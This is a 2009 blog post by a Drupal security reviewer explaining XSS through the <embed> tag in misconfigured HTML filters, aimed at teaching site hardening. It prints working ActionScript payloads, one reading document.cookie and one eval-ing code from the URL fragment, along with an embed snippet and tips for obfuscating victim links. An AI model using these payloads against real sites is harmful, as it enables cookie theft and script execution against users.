Heine

  • Home
  • Drupal
  • About
Home

Using <embed> for XSS

Heine —Fri, 2009/10/30 - 18:38

I see a lot less stray <script> tags in the "Allowed HTML tags:" of the HTML filter these days. The <embed> tag is something I still see a lot in misconfigured formats.

It's rather easy to exploit such formats to execute JavaScript with a little bit of ActionScript:

class Main
{
  static function main(){  
    getURL('javascript:alert(document.cookie)');    
  }
}

Build with an ActionScript 2 compiler (eg Flex SDK), upload to a convenient location *), then make a post on the site that was so careless to allow the <embed> tag:

<embed width="0" height="0" src="http://convenient-location.example.com/XSS.swf" AllowScriptAccess="always"></embed>
Excellent article, it's pleasure to read your blog ?
<a href="http://example.com/fxxgg">FOREX</a>

Now all you have to do is lead the victim to this URL:

<a href="http://victims-site.example.com/your_swf_post">Spam on the forum</a>

If you can't be bothered to change your swf file all the time, you can attempt to create a generic XSS attack that fetches JS from the URL fragment:

class Main
{
  static function main(){  
    getURL('javascript:eval(document.location.hash.substr(1))');    
  }
}

The victim now has to visit (use a URL shortener for maximum obfuscation):

<a href="http://victims-site.example.com/your_swf_post#alert('another boring alert')">Spam on the forum</a>

That's it folks. Moral of the story: don't allow <embed> use in the HTML filter. If you need to embed videos, employ one of the modules that insert videos from trusted sources and prevent script interaction.

*) Bonus points if you upload the swf to another misconfigured Drupal site! Hint:

"Only files with the following extensions may be uploaded" swf
  • Drupal
  • Security
  • Planet Drupal
  • Input Format

Comments

Thanks Heine, I've often

Submitted by dalin (not verified) on Sun, 2009/11/01 - 13:27

Thanks Heine, I've often tried to find the details of why embed was dangerous but could never find it.

Recent posts

  • Other vectors for SA-CORE-2014-005?
  • Lazy loading: hook_hook_info is for hook owners only.
  • "Always offline" problem in EA's Origin due to antivirus
  • From bug to exploit - Bakery SSO
  • Solving getting bogus dates via MSSQL_QUERY
more

Security reviews

I provide security reviews of custom code, contributed modules, themes and entire sites via LimoenGroen.

Contact us for a quote.

Follow @Ustima

Copyright © 2016 by Heine Deelstra. All rights reserved.

  • Home
  • Drupal
  • About